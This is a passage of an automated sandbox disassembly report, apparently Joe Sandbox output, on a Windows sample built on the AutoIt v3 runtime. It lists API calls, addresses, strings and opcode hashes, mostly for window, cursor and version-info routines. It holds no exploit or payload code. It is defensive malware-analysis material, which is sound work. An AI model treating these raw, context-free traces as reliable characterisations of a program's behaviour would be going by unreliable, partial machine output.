                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AE3
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00477AEE
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477B00
                                                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00492CAC,00000000), ref: 00477B16
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00477B26
                                                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00477B4C
                                                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00477B6B
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477B8D
                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477D7A
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                        • API String ID: 2211948467-2373415609
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?,0048F910), ref: 00483627
                                                                                        • IsWindowVisible.USER32(?), ref: 0048364B
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpperVisibleWindow
                                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                        • API String ID: 4105515805-45149045
                                                                                        APIs
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 0048A630
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0048A661
                                                                                        • GetSysColor.USER32(0000000F), ref: 0048A66D
                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 0048A687
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0048A696
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A6C1
                                                                                        • GetSysColor.USER32(00000010), ref: 0048A6C9
                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 0048A6D0
                                                                                        • FrameRect.USER32(?,?,00000000), ref: 0048A6DF
                                                                                        • DeleteObject.GDI32(00000000), ref: 0048A6E6
                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0048A731
                                                                                        • FillRect.USER32(?,?,00000000), ref: 0048A763
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0048A78E
                                                                                          • Part of subcall function 0048A8CA: GetSysColor.USER32(00000012), ref: 0048A903
                                                                                          • Part of subcall function 0048A8CA: SetTextColor.GDI32(?,?), ref: 0048A907
                                                                                          • Part of subcall function 0048A8CA: GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                                                                          • Part of subcall function 0048A8CA: GetSysColor.USER32(0000000F), ref: 0048A928
                                                                                          • Part of subcall function 0048A8CA: GetSysColor.USER32(00000011), ref: 0048A945
                                                                                          • Part of subcall function 0048A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                                                                          • Part of subcall function 0048A8CA: SelectObject.GDI32(?,00000000), ref: 0048A964
                                                                                          • Part of subcall function 0048A8CA: SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                                                                          • Part of subcall function 0048A8CA: SelectObject.GDI32(?,?), ref: 0048A97A
                                                                                          • Part of subcall function 0048A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                                                                          • Part of subcall function 0048A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                                                                          • Part of subcall function 0048A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                                                                          • Part of subcall function 0048A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                                                                        Similarity
                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                        • String ID:
                                                                                        • API String ID: 3521893082-0
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(?,?,?), ref: 00402CA2
                                                                                        • DeleteObject.GDI32(00000000), ref: 00402CE8
                                                                                        • DeleteObject.GDI32(00000000), ref: 00402CF3
                                                                                        • DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
                                                                                        • DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C43B
                                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C474
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043C89D
                                                                                          • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                                                        • SendMessageW.USER32(?,00001053), ref: 0043C8DA
                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043C8F1
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C907
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C912
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                        • String ID: 0
                                                                                        • API String ID: 464785882-4108050209
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(00000000), ref: 004774DE
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047759D
                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004775DB
                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004775ED
                                                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477633
                                                                                        • GetClientRect.USER32(00000000,?), ref: 0047763F
                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477683
                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00477692
                                                                                        • GetStockObject.GDI32(00000011), ref: 004776A2
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004776A6
                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004776B6
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004776BF
                                                                                        • DeleteDC.GDI32(00000000), ref: 004776C8
                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004776F4
                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 0047770B
                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477746
                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0047775A
                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 0047776B
                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0047779B
                                                                                        • GetStockObject.GDI32(00000011), ref: 004777A6
                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004777B1
                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004777BB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0046AD1E
                                                                                        • GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046ADFB
                                                                                        • SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046AF59
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DriveType
                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000012), ref: 0048A903
                                                                                        • SetTextColor.GDI32(?,?), ref: 0048A907
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                                                                        • GetSysColor.USER32(0000000F), ref: 0048A928
                                                                                        • CreateSolidBrush.GDI32(?), ref: 0048A92D
                                                                                        • GetSysColor.USER32(00000011), ref: 0048A945
                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0048A964
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                                                                        • SelectObject.GDI32(?,?), ref: 0048A97A
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048AA14
                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0048AA32
                                                                                        • DrawFocusRect.USER32(?,?), ref: 0048AA3D
                                                                                        • GetSysColor.USER32(00000011), ref: 0048AA4B
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 0048AA53
                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AA67
                                                                                        • SelectObject.GDI32(?,0048A5FA), ref: 0048AA7E
                                                                                        • DeleteObject.GDI32(?), ref: 0048AA89
                                                                                        • SelectObject.GDI32(?,?), ref: 0048AA8F
                                                                                        • DeleteObject.GDI32(?), ref: 0048AA94
                                                                                        • SetTextColor.GDI32(?,?), ref: 0048AA9A
                                                                                        • SetBkColor.GDI32(?,?), ref: 0048AAA4
                                                                                        Similarity
                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488AC1
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488AD2
                                                                                        • CharNextW.USER32(0000014E), ref: 00488B01
                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488B42
                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488B58
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488B69
                                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488B86
                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00488BD8
                                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488BEE
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00488C1F
                                                                                        • _memset.LIBCMT ref: 00488C44
                                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488C8D
                                                                                        • _memset.LIBCMT ref: 00488CEC
                                                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488D16
                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00488D6E
                                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00488E1B
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00488E3D
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488E87
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488EB4
                                                                                        • DrawMenuBar.USER32(?), ref: 00488EC3
                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00488EEB
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                        • String ID: 0
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(?), ref: 004849CA
                                                                                        • GetDesktopWindow.USER32 ref: 004849DF
                                                                                        • GetWindowRect.USER32(00000000), ref: 004849E6
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00484A48
                                                                                        • DestroyWindow.USER32(?), ref: 00484A74
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484A9D
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484ABB
                                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484AE1
                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00484AF6
                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484B09
                                                                                        • IsWindowVisible.USER32(?), ref: 00484B29
                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484B44
                                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484B58
                                                                                        • GetWindowRect.USER32(?,?), ref: 00484B70
                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00484B96
                                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00484BB0
                                                                                        • CopyRect.USER32(?,?), ref: 00484BC7
                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00484C32
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                        • String ID: ($0$tooltips_class32
                                                                                        • API String ID: 698492251-4156429822
                                                                                        APIs
                                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004644AC
                                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004644D2
                                                                                        • _wcscpy.LIBCMT ref: 00464500
                                                                                        • _wcscmp.LIBCMT ref: 0046450B
                                                                                        • _wcscat.LIBCMT ref: 00464521
                                                                                        • _wcsstr.LIBCMT ref: 0046452C
                                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00464548
                                                                                        • _wcscat.LIBCMT ref: 00464591
                                                                                        • _wcscat.LIBCMT ref: 00464598
                                                                                        • _wcsncpy.LIBCMT ref: 004645C3
                                                                                        Similarity
                                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                        • API String ID: 699586101-1459072770
                                                                                        APIs
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
                                                                                        • GetSystemMetrics.USER32(00000007), ref: 004028C4
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
                                                                                        • GetSystemMetrics.USER32(00000008), ref: 004028F7
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 0040291C
                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
                                                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
                                                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 004029AE
                                                                                        • GetStockObject.GDI32(00000011), ref: 004029CA
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5
                                                                                          • Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
                                                                                          • Part of subcall function 00402344: ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                                                                          • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                                                          • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC
                                                                                        Similarity
                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                        • String ID: AutoIt v3 GUI
                                                                                        • API String ID: 1458621304-248962490
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0045A47A
                                                                                        • __swprintf.LIBCMT ref: 0045A51B
                                                                                        • _wcscmp.LIBCMT ref: 0045A52E
                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045A583
                                                                                        • _wcscmp.LIBCMT ref: 0045A5BF
                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 0045A5F6
                                                                                        • GetDlgCtrlID.USER32(?), ref: 0045A648
                                                                                        • GetWindowRect.USER32(?,?), ref: 0045A67E
                                                                                        • GetParent.USER32(?), ref: 0045A69C
                                                                                        • ScreenToClient.USER32(00000000), ref: 0045A6A3
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0045A71D
                                                                                        • _wcscmp.LIBCMT ref: 0045A731
                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0045A757
                                                                                        • _wcscmp.LIBCMT ref: 0045A76B
                                                                                          • Part of subcall function 0042362C: _iswctype.LIBCMT ref: 00423634
                                                                                        Similarity
                                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                        • String ID: %s%u
                                                                                        • API String ID: 3744389584-679674701
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
                                                                                        • _wcscmp.LIBCMT ref: 0045AF29
                                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 0045AF6E
                                                                                        • _wcscmp.LIBCMT ref: 0045AF8C
                                                                                        • _wcsstr.LIBCMT ref: 0045AF9D
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0045AFD5
                                                                                        • _wcscmp.LIBCMT ref: 0045AFE5
                                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B00C
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0045B055
                                                                                        • _wcscmp.LIBCMT ref: 0045B065
                                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 0045B08D
                                                                                        • GetWindowRect.USER32(00000004,?), ref: 0045B0F6
                                                                                        Similarity
                                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                        • String ID: @$ThumbnailClass
                                                                                        • API String ID: 1788623398-1539354611
                                                                                        APIs
                                                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 0048C627
                                                                                          • Part of subcall function 0048AB37: ClientToScreen.USER32(?,?), ref: 0048AB60
                                                                                          • Part of subcall function 0048AB37: GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                                                          • Part of subcall function 0048AB37: PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C690
                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C6BE
                                                                                        • _wcscat.LIBCMT ref: 0048C6EE
                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C705
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C71E
                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C735
                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C757
                                                                                        • DragFinish.SHELL32(?), ref: 0048C75E
                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048C851
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbL
                                                                                        • API String ID: 169749273-3863044002
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                        • API String ID: 1038674560-1810252412
                                                                                        APIs
                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00475013
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0047501E
                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00475029
                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00475034
                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 0047503F
                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 0047504A
                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00475055
                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00475060
                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 0047506B
                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00475076
                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00475081
                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 0047508C
                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00475097
                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 004750A2
                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004750AD
                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 004750B8
                                                                                        • GetCursorInfo.USER32(?), ref: 004750C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$Load$Info
                                                                                        • String ID:
                                                                                        • API String ID: 2577412497-0
                                                                                        • Opcode ID: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                                                                        • Instruction ID: d5c7a2001707235dd9e126089dd3671015cbda4ea0a9ffae781a460d29ca5a6d
                                                                                        • Opcode Fuzzy Hash: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                                                                        • Instruction Fuzzy Hash: 7F3114B1D083196ADF109FB68C8999FBFE8FF04750F50453BA50DEB281DA7865048F95
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 0048A259
                                                                                        • DestroyWindow.USER32(?,?), ref: 0048A2D3
                                                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A34D
                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A36F
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A382
                                                                                        • DestroyWindow.USER32(00000000), ref: 0048A3A4
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A3DB
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A3F4
                                                                                        • GetDesktopWindow.USER32 ref: 0048A40D
                                                                                        • GetWindowRect.USER32(00000000), ref: 0048A414
                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A42C
                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A444
                                                                                          • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                        • String ID: 0$tooltips_class32
                                                                                        • API String ID: 1297703922-3619404913
                                                                                        • Opcode ID: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                                                        • Instruction ID: 021702ee8d535e162beb7c83f4b22bae82635ac61efe1e234d944cc96a30802f
                                                                                        • Opcode Fuzzy Hash: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                                                        • Instruction Fuzzy Hash: CE719270141204AFE721DF18CC49F6B77E5FB88704F04492EF985972A0D7B8E956CB6A
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00484424
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0048446F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
